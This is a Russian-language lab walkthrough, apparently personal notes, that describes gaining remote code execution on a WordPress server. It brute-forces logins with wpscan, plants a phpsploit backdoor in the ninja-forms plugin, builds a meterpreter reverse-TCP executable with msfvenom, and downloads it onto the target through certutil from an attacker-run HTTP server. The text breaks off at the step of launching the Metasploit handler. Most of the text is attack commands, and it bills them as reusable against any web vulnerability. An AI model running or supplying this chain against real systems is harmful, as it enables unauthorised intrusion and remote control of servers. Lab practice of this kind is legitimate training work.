Получение RCE в лабораторной работе через web-прложение, это просто подход, который можно реплицировать на любую уязвимость вебчика в контексте RCE:

  1. Подключение к веб-серверу: http://10.0.2.X:8585/
  2. Перебор паролей wordpress:

wpscan --url <http://10.152.152.11:8585/wordpress/> --enumerate u -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt

Используя полученные учетные данные нужно зайти с правами администратора и добавить бэкдор в плагин, например, в ninja-forms.

  1. Подключение к бэкдору с помощью C2 phpsploit:

phpsploit - запуск фреймворка для удобной эксплуатации

phpsploit > set - получение строки импланта, который можно будет использовать в качестве полезной нагрузки в разделе “Плагины”

Untitled

  1. Настраиваем С2

phpsploit > set target [<http://10.0.0.101:8585/wordpress/wp-content/plugins/ninja-forms/index.php>](<http://10.0.0.101:8585/wordpress/wp-content/plugins/ninja-forms/index.php>) - нативно выполняем подсказки консоли и указываем директорию с имплантом

phpsploit > exploit - выполняем обратное подключение

Untitled

  1. Используя бэкдор можно запустить meterpreter. Создадим исполняемый файл:

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.0.2.X lport=4444 -f exe > reverse_tcp.exe # X - последний октет ip-адреса Kali Linux

  1. Подготовка к передаче meterpreter через веб-сервер:

Kali: python3 -m http.server 80

C2: run certutil.exe -urlcache -split -f [<http://10.0.0.100:80/reverse_tcp.exe>](<http://10.0.0.100/reverse_tcp.exe>) - загружаем имплант от для получения интерактивное оболочки meterpreter

Untitled

Untitled

  1. Запуск серверной части в MSF: